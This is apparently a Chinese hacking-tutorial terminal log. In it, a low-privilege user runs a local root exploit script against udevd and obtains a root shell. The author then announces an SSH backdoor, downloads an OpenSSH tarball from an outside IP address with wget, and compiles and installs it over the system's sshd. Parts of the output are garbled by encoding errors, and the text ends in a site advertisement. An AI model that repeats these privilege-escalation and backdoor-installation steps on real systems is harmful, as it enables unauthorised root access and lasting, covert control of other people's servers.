root 477 0.0 0.0 2916 1396 ? S< 12:36 0:00 /sbin/udevd -d
ldc 3462 0.0 0.0 4128 680 pts/0 S 13:00 0:00 grep udev
[ldc@localhost .v]$ sh u.sh 476
suid.c: 鍦ㄥ嚱鏁?鈥榤ain鈥?涓細
suid.c:3: 璀﹀憡锛氶殣寮忓0鏄庝笌鍐呭缓鍑芥暟 鈥榚xecl鈥?涓嶅吋瀹
sh-3.1# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh
已经是root权限了。
sh-3.1# w
13:25:18 up 48 min, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
ldc pts/0 100.204.107.20 13:05 0.00s 0.12s 0.06s sshd: ldc [priv]
sh-3.1# pwd
/home/ldc/.v
sh-3.1# ssh -V
OpenSSH_4.3p2, OpenSSL 0.9.8b 04 May 2006
我们先留个ssh的后门。
sh-3.1# wget http://211.100.50.70/openssh4.3p2.tar.gz
--13:32:08-- http://211.100.50.70/openssh4.3p2.tar.gz
Connecting to 211.100.50.70:80... 宸茶繛鎺ャ€
宸插彂鍑?HTTP 璇锋眰锛屾鍦ㄧ瓑寰呭洖搴?.. 200 OK
闀垮害锛?79990 (957K) [application/x-gzip]
Saving t `openssh4.3p2.tar.gz'
100%[===========================================================================================>] 979,990 1.14M/s in 0.8s
13:32:08 (1.14 MB/s) - `openssh4.3p2.tar.gz' saved [979990/979990]
sh-3.1# tar zxf openssh4.3p2.tar.gz
sh-3.1# cd openssh-4.3p2/
sh-3.1# ./configure --prefix=/usr --sysconfdir=/etc/ssh
checking for gcc... gcc
checking for C compiler default output file name... a.out
............(省略若干行)
sh-3.1# make && make install
conffile=`echo sshd_config.out (北联网教程,专业提供视频软件下载)
……